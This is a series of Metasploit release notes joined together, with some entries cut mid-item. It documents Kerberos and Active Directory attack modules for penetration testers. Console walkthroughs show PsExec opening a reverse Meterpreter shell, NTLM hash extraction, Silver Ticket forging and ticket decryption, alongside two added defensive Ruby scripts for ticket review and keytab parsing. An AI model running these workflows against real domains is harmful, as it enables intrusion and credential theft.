Type: Exploit
Pull request: #17415 contributed by timwr
AttackerKB reference: CVE-2022-46689
Description: This module is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root.
Description: This adds a post module that captures credentials from Veeam Backup & Recovery and Veeam ONE Monitor versions 9.x – 11.x.
Enhancements and features (11)
#16946 from cgranleese-r7 – Updates the show targets and show actions commands to display a visual indicator beside the currently selected value.
#17481 from h00die – An update has been made to the modules/auxiliary/scanner/http/options.rb module to modernize a few of its options, tidy up the code, and to handle an edge case when a target server might respond with a Tomcat error page.
#17504 from ErikWynter – Two aliases for show favorites have been added, namely favorite -l and favorites, to allow for easier listing of modules that users have marked as their favorites.
#17560 from adfoster-r7 – Updates the Kerberos inspect_ticket module to show unsupported pac buffer ul_types in a clearer way to the user.
#17563 from bcoles – Improves documentation and code quality for modules/exploits/multi/local.
#17564 from serializingme – Improves the CIPCTlv definition for the exploits/windows/local/anyconnect_lpe module.
#17570 from zeroSteiner – The list of default queries used by the ldap_query module has been updated to add in the ENUM_DOMAIN and ENUM_MACHINE_ACCOUNT_QUOTA queries and to make some small updates to existing queries.
#17575 from zeroSteiner – Updates the Kerberos ccache functionality to automatically perform sname switching on Service Tickets when the ticket sname does not match the Metasploit module’s required sname. This allows for a service ticket associated with the SPN service_a/host.domain.local to be used and updated to service_b/host.domain.local dynamically as part of service authentication.
#17577 from bcoles – Updates modules/exploits/qnx to run the check command before attempting to exploit the target.
#17581 from bcoles – This PR modifies the conditions in 45 local privilege escalation modules to check whether the operator set ForceExploit to true before checking the permissions required for exploitation on the remote target, which is more efficient and quieter over the network.
Bugs fixed (4)
#17444 from hamax97 – A bug has been fixed whereby issuing a command line argument that contained nested equals signs would not be parsed correctly, and would instead be treated as two separate command line statements.
#17557 from zeroSteiner – This fixes the logon timestamp in the MS14-068 exploit so the generated ticket works.
#17558 from cgranleese-r7 – Fixes a crash in msfconsole’s analyze command when a WinRM session was open.
#17561 from gwillcox-r7 – This fixes the direction for some Railgun function definitions in iphlpapi.
Documentation added (1)
#17565 from adfoster-r7 – Updates the docs site to add color to Metasploit console examples.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
The Metasploit team is pleased to announce the release of Metasploit Framework 6.3, which adds native support for Kerberos authentication, incorporates new modules to conduct a wide range of Active Directory attacks, and simplifies complex workflows to support faster and more intuitive security testing.
Background
Kerberos is an authentication protocol that is commonly used to verify the identity of a user or a host in Windows environments. Kerberos support is built into most operating systems, but it’s best known as the authentication protocol used in Active Directory implementations. Thousands of organizations worldwide rely on Active Directory to define user groups and permissions and to provision network resources.
Kerberos and Active Directory more broadly have been prime attack targets for years and have featured prominently in both threat actor and pen tester playbooks. A fresh wave of Active Directory attacks proliferated in mid-2021, after researchers Will Schroeder and Lee Christensen published a technical whitepaper on a slew of novel attack techniques targeting Active Directory Certificate Services (AD CS). AD CS is a popular tool that allows administrators to implement public key infrastructure, and to issue and manage public key certificates. Abusing AD CS gave adversaries and red teams fresh opportunities to escalate privileges, move laterally, and establish persistence within Windows environments.
More than ever, first-class support for Active Directory and Kerberos-based attack techniques is critical to many pen testers and security researchers as they look to demonstrate risk to clients and the public. Plenty of new tooling has sprung up to facilitate offensive security operations in this space, but much of that tooling requires operators to manage their own tickets and environment variables, and/or is too narrowly scoped to support end-to-end attack workflows. As a result, many operators find themselves using multiple purpose-built tools to accomplish specific pieces of their playbooks, and then having to track ticket information manually to pursue broader objectives.
New in Metasploit 6.3
Metasploit Framework 6.3 streamlines Kerberos and Active Directory attack workflows by allowing users to authenticate to multiple services via Kerberos and build attack chains with new modules that request, forge, and convert tickets between formats for use in other tools. Tickets are cached and stored in the Metasploit database as loot, which removes the need for manual management of environment variables. Attack workflows support pivoting over sessions out of the box, as users expect from Metasploit.
Highlights include:
Native Kerberos authentication over HTTP, LDAP, MSSQL, SMB, and WinRM
The ability to request Ticket-Granting Tickets (TGT) and Ticket-Granting Server (TGS) from the Key Distribution Center (KDC) if the user obtains a password, NT hash, or encryption key; users can also request tickets via PKINIT with certificates issued from AD CS
Kerberos ticket inspection and debugging via the auxiliary/admin/kerberos/inspect_ticket module and the auxiliary/admin/kerberos/keytab module, which can generate Keytab files to allow decryption of Kerberos network traffic in Wireshark
Fully automated privilege escalation via Certifried (CVE-2022-26923)
MSF 6.3 also includes new modules for key attack primitives in Active Directory Domain Services (AD DS) environments, including creation of computer accounts, abuse of Role Based Constrained Delegation (RBCD), and enumeration of 28 key data points via LDAP. AD DS modules include:
auxiliary/admin/ldap/rbcd, which lets users configure an object in Active Directory to permit another object to impersonate any other account
auxiliary/gather/ldap_query, which allows for remote LDAP server queries, including custom and group queries
In recent years, adversaries have frequently abused misconfigurations in AD CS to escalate privileges and maintain access to networks. Metasploit 6.3 adds new modules to find and execute certificate attacks, including:
Additional features and improvements since Metasploit 6.2 include:
A sixth getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM ("EfsPotato")
Updated show options support that lets module authors specify the conditions under which options are relevant to the user (e.g., a particular action or datastore value being set)
Example workflows
Below are some sample workflows for common actions supported in Metasploit 6.3. Additional workflows and context on Kerberos have been documented on the Metasploit docs site. This documentation is open-source, and contributions are welcome.
Kerberos Service Authentication
Opening a WinRM session:
msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[+] 192.168.123.13:5985 - Login Successful: demo.local\Administrator:p4$$w0rd
[*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 1...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>
Querying LDAP for accounts:
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================
Name Attributes
---- ----------
badpwdcount 0
pwdlastset 133184302034979121
samaccountname Administrator
useraccountcontrol 512
... etc ...
Running PsExec against a host:
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
meterpreter >
Connecting to a Microsoft SQL Server instance and running a query:
When running Metasploit with a database, all Kerberos tickets will be persisted into the database. The klist command can be used to view these persisted tickets. It is a top-level command and can be run even if a module is in use:
The klist command also supports the -v flag for showing additional detail.
Requesting tickets
The auxiliary/admin/kerberos/get_ticket module can be used to request TGT/TGS tickets from the KDC. For instance, the following example will request a TGS impersonating the Administrator account:
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
[*] Running module against 10.0.0.24
[*] 10.0.0.24:88 - Getting TGS impersonating [email protected] (SPN: cifs/dc02.mylab.local)
[+] 10.0.0.24:88 - Received a valid TGT-Response
[*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
[+] 10.0.0.24:88 - Received a valid TGS-Response
[+] 10.0.0.24:88 - Received a valid TGS-Response
[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
[*] Auxiliary module execution completed
The auxiliary/admin/kerberos/get_ticket module also supports authentication via PKINIT with the CERT_FILE and CERT_PASSWORD options. When used with the GET_HASH action, a user-to-user (U2U) authentication TGS will be requested, from which the NT hash can be calculated. This allows a user to obtain the NTLM hash for the account for which the certificate was issued.
msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230126155141_default_192.168.159.10_windows.ad.cs_404736.pfx
[*] Running module against 192.168.159.10
[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_813470.bin
[*] 192.168.159.10:88 - Getting NTLM hash for [email protected]
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_485504.bin
[+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) >
Forging tickets
After compromising a KDC or service account, users can forge Kerberos tickets for persistence. The auxiliary/admin/kerberos/forge_ticket module can forge Golden Tickets with the KRBTGT account hash, or Silver Tickets with service hashes:
msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=demo.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.demo.local
[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
[*] Auxiliary module execution completed
Kerberos debugging support
Metasploit 6.3 also introduces new tools that will make it easier for module developers and researchers to target Kerberos environments.
The new auxiliary/admin/kerberos/inspect_ticket module can show the contents of a Kerberos ticket, including the decrypted ticket part when the key is known, for example after running the auxiliary/gather/windows_secrets_dump module or similar:
msf6 > use auxiliary/admin/kerberos/inspect_ticket
msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
Primary Principal: [email protected]
Ccache version: 4
Creds: 1
Credential[0]:
Server: cifs/[email protected]
Client: [email protected]
Ticket etype: 18 (AES256)
Key: 3436643936633032656264663030393931323461366635653364393932613763
Ticket Length: 978
Subkey: false
Addresses: 0
Authdatas: 0
Times:
Auth time: 2022-11-21 13:52:00 +0000
Start time: 2022-11-21 13:52:00 +0000
End time: 2032-11-18 13:52:00 +0000
Renew Till: 2032-11-18 13:52:00 +0000
Ticket:
Ticket Version Number: 5
Realm: WINDOMAIN.LOCAL
Server Name: cifs/dc.windomain.local
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):
Times:
Auth time: 2022-11-21 13:52:00 UTC
Start time: 2022-11-21 13:52:00 UTC
End time: 2032-11-18 13:52:00 UTC
Renew Till: 2032-11-18 13:52:00 UTC
Client Addresses: 0
Transited: tr_type: 0, Contents: ""
Client Name: 'Administrator'
Client Realm: 'WINDOMAIN.LOCAL'
Ticket etype: 18 (AES256)
Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763
Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
PAC:
Validation Info:
Logon Time: 2022-11-21 13:52:00 +0000
Logoff Time: Never Expires (inf)
Kick Off Time: Never Expires (inf)
Password Last Set: No Time Set (0)
Password Can Change: No Time Set (0)
Password Must Change: Never Expires (inf)
Logon Count: 0
Bad Password Count: 0
User ID: 500
Primary Group ID: 513
User Flags: 0
User Session Key: 00000000000000000000000000000000
User Account Control: 528
Sub Auth Status: 0
Last Successful Interactive Logon: No Time Set (0)
Last Failed Interactive Logon: No Time Set (0)
Failed Interactive Logon Count: 0
SID Count: 0
Resource Group Count: 0
Group Count: 5
Group IDs:
Relative ID: 513, Attributes: 7
Relative ID: 512, Attributes: 7
Relative ID: 520, Attributes: 7
Relative ID: 518, Attributes: 7
Relative ID: 519, Attributes: 7
Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369
Effective Name: 'Administrator'
Full Name: ''
Logon Script: ''
Profile Path: ''
Home Directory: ''
Home Directory Drive: ''
Logon Server: ''
Logon Domain Name: 'WINDOMAIN.LOCAL'
Client Info:
Name: 'Administrator'
Client ID: 2022-11-21 13:52:00 +0000
Pac Server Checksum:
Signature: 04e5ab061c7a909a26b122c2
Pac Privilege Server Checksum:
Signature: 710bb183858257f41021bd7e
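The inspect_ticket output above contains everything needed to judge whether a cached ticket looks like one the KDC actually issued. The following Ruby script is an added example, not code from Metasploit or from this post: it reads that text format, decodes the Flags word using the RFC 4120 TicketFlags bit positions, compares the validity and renew windows against the Windows Default Domain Policy Kerberos defaults (10 hour ticket age, 7 day renew age; assumptions about the target's policy), and lists privileged well-known RIDs found in the PAC. The SAMPLE_OUTPUT excerpt is constructed from the values shown in the output above and is not a real ticket.

```ruby
require 'time'

# Added example (not Metasploit's own code): review the text printed by
# auxiliary/admin/kerberos/inspect_ticket and report the properties a reviewer
# checks when deciding whether a ticket was built by the KDC or elsewhere.
module TicketReview
  # RFC 4120 section 5.4.1 TicketFlags; bit 0 is the most significant bit of
  # the 32-bit value that inspect_ticket prints after "Flags:".
  TICKET_FLAGS = {
    1 => 'FORWARDABLE', 2 => 'FORWARDED', 3 => 'PROXIABLE', 4 => 'PROXY',
    5 => 'MAY_POSTDATE', 6 => 'POSTDATED', 7 => 'INVALID', 8 => 'RENEWABLE',
    9 => 'INITIAL', 10 => 'PRE_AUTHENT', 11 => 'HW_AUTHENT',
    12 => 'TRANSITED_POLICY_CHECKED', 13 => 'OK_AS_DELEGATE'
  }.freeze
  # Well-known RIDs of privileged domain groups.
  PRIVILEGED_RIDS = { 512 => 'Domain Admins', 518 => 'Schema Admins',
                      519 => 'Enterprise Admins', 520 => 'Group Policy Creator Owners' }.freeze
  # Assumed policy: Windows Default Domain Policy Kerberos defaults.
  MAX_TICKET_AGE = 10 * 3600
  MAX_RENEW_AGE = 7 * 86_400

  # Constructed excerpt in the inspect_ticket output format, using the values
  # from the sample above; not a real ticket.
  SAMPLE_OUTPUT = <<~TXT
    Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):
    Times:
    Auth time: 2022-11-21 13:52:00 UTC
    Start time: 2022-11-21 13:52:00 UTC
    End time: 2032-11-18 13:52:00 UTC
    Renew Till: 2032-11-18 13:52:00 UTC
    Client Name: 'Administrator'
    Client Realm: 'WINDOMAIN.LOCAL'
    Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
    PAC:
    Validation Info:
    Password Last Set: No Time Set (0)
    Logon Count: 0
    User ID: 500
    Group IDs:
    Relative ID: 513, Attributes: 7
    Relative ID: 512, Attributes: 7
    Relative ID: 520, Attributes: 7
    Relative ID: 518, Attributes: 7
    Relative ID: 519, Attributes: 7
  TXT

  # Turn the 32-bit flags word into the names of the set flags.
  def self.decode_flags(value)
    TICKET_FLAGS.select { |bit, _| ((value >> (31 - bit)) & 1) == 1 }.values
  end

  # Pull the fields of interest out of the "key: value" lines; later Times
  # blocks (the decrypted ticket part) overwrite the earlier ccache copy.
  def self.parse(text)
    t = { rids: [], flags: 0, pwd_last_set_unset: false }
    text.each_line do |raw|
      case raw.strip
      when /\AStart time:\s*(.+)\z/ then t[:start] = Time.parse(Regexp.last_match(1))
      when /\AEnd time:\s*(.+)\z/ then t[:end] = Time.parse(Regexp.last_match(1))
      when /\ARenew Till:\s*(.+)\z/ then t[:renew_till] = Time.parse(Regexp.last_match(1))
      when /\AFlags:\s*0x([0-9a-fA-F]+)/ then t[:flags] = Regexp.last_match(1).to_i(16)
      when /\AClient Name:\s*'([^']*)'/ then t[:client] = Regexp.last_match(1)
      when /\AUser ID:\s*(\d+)/ then t[:user_id] = Regexp.last_match(1).to_i
      when /\ALogon Count:\s*(\d+)/ then t[:logon_count] = Regexp.last_match(1).to_i
      when /\APassword Last Set:\s*(.+)/ then t[:pwd_last_set_unset] = Regexp.last_match(1).include?('No Time Set')
      when /\ARelative ID:\s*(\d+)/ then t[:rids] << Regexp.last_match(1).to_i
      end
    end
    t
  end

  # Return decoded flags, the ticket lifetime and a list of review findings.
  def self.review(text)
    t = parse(text)
    findings = []
    lifetime = t[:end] - t[:start]
    if lifetime > MAX_TICKET_AGE
      findings << format('ticket lifetime %.0fh exceeds the %dh default MaxTicketAge', lifetime / 3600, MAX_TICKET_AGE / 3600)
    end
    if t[:renew_till] && (t[:renew_till] - t[:start]) > MAX_RENEW_AGE
      findings << format('renewable until %s, beyond the %dd default MaxRenewAge', t[:renew_till].getutc, MAX_RENEW_AGE / 86_400)
    end
    privileged = t[:rids].select { |r| PRIVILEGED_RIDS.key?(r) }
    findings << "PAC grants privileged groups: #{privileged.map { |r| PRIVILEGED_RIDS[r] }.join(', ')}" unless privileged.empty?
    findings << 'PAC client is RID 500 (built-in Administrator)' if t[:user_id] == 500
    if t[:logon_count] == 0 && t[:pwd_last_set_unset]
      findings << 'PAC account fields are zeroed (Logon Count 0, Password Last Set unset); a KDC-built PAC carries real values'
    end
    { ticket: t, flags: decode_flags(t[:flags]), lifetime_seconds: lifetime, findings: findings }
  end
end

puts TicketReview.review(TicketReview::SAMPLE_OUTPUT)[:findings] if __FILE__ == $PROGRAM_NAME
```

Run against the sample, the script reports the ten-year validity window, the privileged group RIDs and the zeroed logon fields; the same properties are what make forged tickets stand out in a SOC review of exported ccache files, so the thresholds should be set from the domain's actual Kerberos policy rather than the defaults assumed here.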
Metasploit has also added first-class support for the Keytab file format for storing the encryption keys of principals. This can be used in Wireshark to automatically decrypt KRB5 network traffic.
For instance, if Metasploit’s database is configured when running the secretsdump module against a domain controller, the extracted Kerberos keys will be persisted in Metasploit’s database:
Once the new Keytab file is created, modify Wireshark to use the exported encryption keys in Edit -> Preferences -> Protocols -> KRB5, and select try to decrypt Kerberos blobs. Now Wireshark will automatically try to decrypt Kerberos blobs — the blue highlighted lines show Wireshark’s decryption working:
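The keytab layout is simple enough to handle directly, which is useful for checking what an exported file contains before handing it to Wireshark. The following Ruby module is an added example, not Metasploit's keytab module or any code from this post: it writes and reads MIT-format (version 0x0502) keytabs, the format the Wireshark KRB5 dissector loads. The principals, keys and timestamp in sample_entries are constructed values, not real domain secrets.

```ruby
require 'stringio'

# Added example (not Metasploit's own code): a minimal MIT keytab (version
# 0x0502) writer and reader. All integers are big-endian. Layout per entry:
#   int32  size (a negative size marks a deleted slot to skip)
#   uint16 component_count
#   counted_octet_string realm                (uint16 length + bytes)
#   counted_octet_string component[...]       ("cifs", "dc3.demo.local")
#   uint32 name_type, uint32 timestamp, uint8 vno8
#   uint16 enctype, counted_octet_string key
#   uint32 vno (optional 32-bit key version; written by this module)
module KeytabDemo
  VERSION = 0x0502
  NT_PRINCIPAL = 1
  ENCTYPES = { 17 => 'aes128-cts-hmac-sha1-96', 18 => 'aes256-cts-hmac-sha1-96',
               23 => 'rc4-hmac' }.freeze

  Entry = Struct.new(:principal, :realm, :kvno, :enctype, :key, :timestamp, :name_type)

  # Constructed sample keys and timestamp; not real domain secrets.
  SAMPLE_AES_KEY = ['00112233445566778899aabbccddeeff' * 2].pack('H*')
  SAMPLE_RC4_KEY = ['0f0e0d0c0b0a09080706050403020100'].pack('H*')
  SAMPLE_TIME = 1_669_038_720

  def self.sample_entries
    [
      Entry.new('cifs/dc3.demo.local', 'DEMO.LOCAL', 2, 18, SAMPLE_AES_KEY, SAMPLE_TIME, NT_PRINCIPAL),
      Entry.new('Administrator', 'DEMO.LOCAL', 1, 23, SAMPLE_RC4_KEY, SAMPLE_TIME, NT_PRINCIPAL)
    ]
  end

  # counted_octet_string: 16-bit length followed by the raw bytes.
  def self.counted(bytes)
    [bytes.bytesize].pack('n') + bytes.b
  end

  def self.serialize_entry(e)
    comps = e.principal.split('/')
    body = [comps.size].pack('n') + counted(e.realm)
    comps.each { |c| body << counted(c) }
    body << [e.name_type, e.timestamp, e.kvno & 0xff].pack('NNC')
    body << [e.enctype].pack('n') << counted(e.key)
    body << [e.kvno].pack('N')
    [body.bytesize].pack('l>') + body
  end

  def self.write(entries)
    [VERSION].pack('n') + entries.map { |e| serialize_entry(e) }.join
  end

  def self.read_counted(io)
    io.read(io.read(2).unpack1('n'))
  end

  def self.parse(data)
    io = StringIO.new(data.b)
    version = io.read(2).unpack1('n')
    raise "unsupported keytab version 0x#{version.to_s(16)}" unless version == VERSION

    entries = []
    until io.eof?
      size = io.read(4).unpack1('l>')
      if size.negative? # deleted slot: skip its payload
        io.seek(-size, IO::SEEK_CUR)
        next
      end
      rec = StringIO.new(io.read(size))
      ncomp = rec.read(2).unpack1('n')
      realm = read_counted(rec)
      comps = Array.new(ncomp) { read_counted(rec) }
      name_type, timestamp, vno8 = rec.read(9).unpack('NNC')
      enctype = rec.read(2).unpack1('n')
      key = read_counted(rec)
      kvno = rec.eof? ? vno8 : rec.read(4).unpack1('N') # prefer the 32-bit vno when present
      entries << Entry.new(comps.join('/'), realm, kvno, enctype, key, timestamp, name_type)
    end
    entries
  end

  # One line per key, in the spirit of `klist -k -e`.
  def self.describe(entries)
    entries.map do |e|
      format('%4d %s@%s (%s)', e.kvno, e.principal, e.realm, ENCTYPES.fetch(e.enctype, "etype #{e.enctype}"))
    end
  end
end

puts KeytabDemo.describe(KeytabDemo.parse(KeytabDemo.write(KeytabDemo.sample_entries))) if __FILE__ == $PROGRAM_NAME
```

Running parse on a keytab exported as described above lists which principals, encryption types and key version numbers it covers; if a service's key is missing or its kvno is stale relative to the ticket, Wireshark will leave that exchange encrypted, so this is the first thing to check when decryption does not kick in.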
Certifried privilege escalation
Metasploit 6.3 adds an auxiliary module that exploits a privilege escalation vulnerability known as Certifried (CVE-2022-26923) in AD CS. The module will generate a valid certificate impersonating the Domain Controller (DC) computer account, and this certificate is then used to authenticate to the target as the DC account using the PKINIT pre-authentication mechanism. The module will get and cache the TGT for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.
Updated show options support
Prior to Metasploit 6.3, the show options and show advanced commands would display a module’s supported options in a single list.
Now module authors can add additional metadata to specify conditions for when options are relevant to the user, such as a particular action or datastore value being set. Metasploit will then logically group these options together when presenting them to the user:
Get it
Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.
New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.
Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Grant Willcox, Jack Heysel, Jacquie Harris, Jeffrey Martin, Matthew Mathur, Navya Harika Karaka, Shelby Pace, Simon Janusz, Spencer McIntyre, and Zach Goldman.
Thanks to community contributor Erik Wynter, Metasploit Framework now has an exploit module for an unauthenticated command injection vulnerability in the Cacti network-monitoring software. The vulnerability is due to a proc_open() call that accepts unsanitized user input in remote_agent.php. Provided that the target server has data that’s tied to the POLLER_ACTION_SCRIPT_PHP action, the vulnerable proc_open() call can be reached with a single GET request. Successful exploitation will result in a session as the user running the Cacti server.
Python Meterpreter Gets a Few Upgrades
The latest release includes some improvements to Python Meterpreter which bring the payload a little closer to feature parity with Windows Meterpreter. For Windows Python Meterpreter, NtAlexio2 added the enumdesktops command, which, as with Windows Meterpreter, enumerates all of the accessible desktops it can find. Our very own zeroSteiner added dual-stack IPv4/IPv6 TCP support for Python Meterpreter. Working across both Windows and Linux, this improvement enables Python Meterpreter to listen on all available interfaces, including ones that have IPv6 addresses.
New module content (1)
Cacti 1.2.22 unauthenticated command injection
Authors: Erik Wynter, Owen Gong, Stefan Schiller, and Steven Seeley
Type: Exploit
Pull request: #17407 contributed by ErikWynter
AttackerKB reference: CVE-2022-46169
Description: This adds an exploit that targets various versions of the Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that, when exploited, results in remote code execution as the user running the Cacti server.
Enhancements and features (3)
#17340 from zeroSteiner – The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
#17518 from zeroSteiner – A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
#17519 from jmartin-r7 – Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
Bugs fixed (2)
#17516 from zeroSteiner – The version of Metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
#17525 from adfoster-r7 – Fixes a deprecation warning when using socks proxy support in Metasploit.
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Have an idea on how to expand on Metasploit Documentation on https://docs.metasploit.com/? Did you see a typo or some other error on the docs site? Thanks to adfoster-r7, submitting an update to the documentation is as easy as clicking the ‘Edit this page on GitHub’ link on the page you want to change. The new link will take you directly to the source in Metasploit’s GitHub so you can quickly locate the Markdown and submit a PR.
New module content (3)
Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit
Author: Krzysztof Burghardt
Type: Auxiliary
Pull request: #17348 contributed by burghardt
AttackerKB reference: CVE-2022-46770
Description: This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
WordPress Paid Membership Pro code Unauthenticated SQLi
Authors: Joshua Martinelle and h00die
Type: Auxiliary
Pull request: #17479 contributed by h00die
AttackerKB reference: CVE-2023-23488
Description: This adds an exploit module that leverages an unauthenticated SQLi against the WordPress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves WordPress usernames and password hashes using a time-based blind SQL injection technique.
Authors: Jakub Kramarz and h00die-gr3y
Type: Exploit
Pull request: #17449 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-44529
Description: A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
Enhancements and features (5)
#17343 from h00die – This makes performance improvements to the windows/local/unquoted_service_path module.
#17451 from h00die – This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
#17466 from prabhatjoshi321 – This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
